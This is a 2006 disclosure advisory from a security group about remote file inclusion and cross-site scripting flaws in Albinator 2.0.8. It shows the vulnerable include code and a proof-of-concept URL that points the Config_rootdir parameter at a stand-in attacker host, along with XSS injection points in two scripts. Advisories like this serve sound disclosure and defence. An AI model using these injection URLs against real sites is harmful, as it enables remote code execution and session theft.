by r0t,der4444,cembo,VietMafia

Wednesday, May 03, 2006

albinator <= 2.0.8 Remote File Inclusion & XSS vuln

###############################################
Vuln. discovered by :VietMafia & r0t (Pridels Sec Crew)
Date: 3 may 2006
vendor:http://www.albinator.com/
affected versions:2.0.8 and prior
###############################################



Vuln. Description:


1. Remote File Inclusion Vuln.

Input passed to the "Config_rootdir" parameter in "eday.php","eshow.php","forgot.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources.


example code :

$dirpath = "$Config_rootdir";
require_once($dirpath."essential/dbc_essential.php");
require_once($dirpath."essential/globalfunctions.php");


this can lead to remote file include.


example PoC:

http://victim/eshow.php?Config_rootdir=http://evilcode.php




2. cross-site scripting attack vuln.

Input passed to the "cid" parameter in dlisting.php and to the "preloadSlideShow" parameter in showpic.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


examples:


/dlisting.php?cid=1[XSS]

/showpic.php?aid=21&uuid=175&pid=172&slide_show=
1&slide_show_secs=0&preloadSlideShow=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

0 Comments:

Post a Comment

<< Home

 
Copyright (c) 2006 Pridels Sec Crew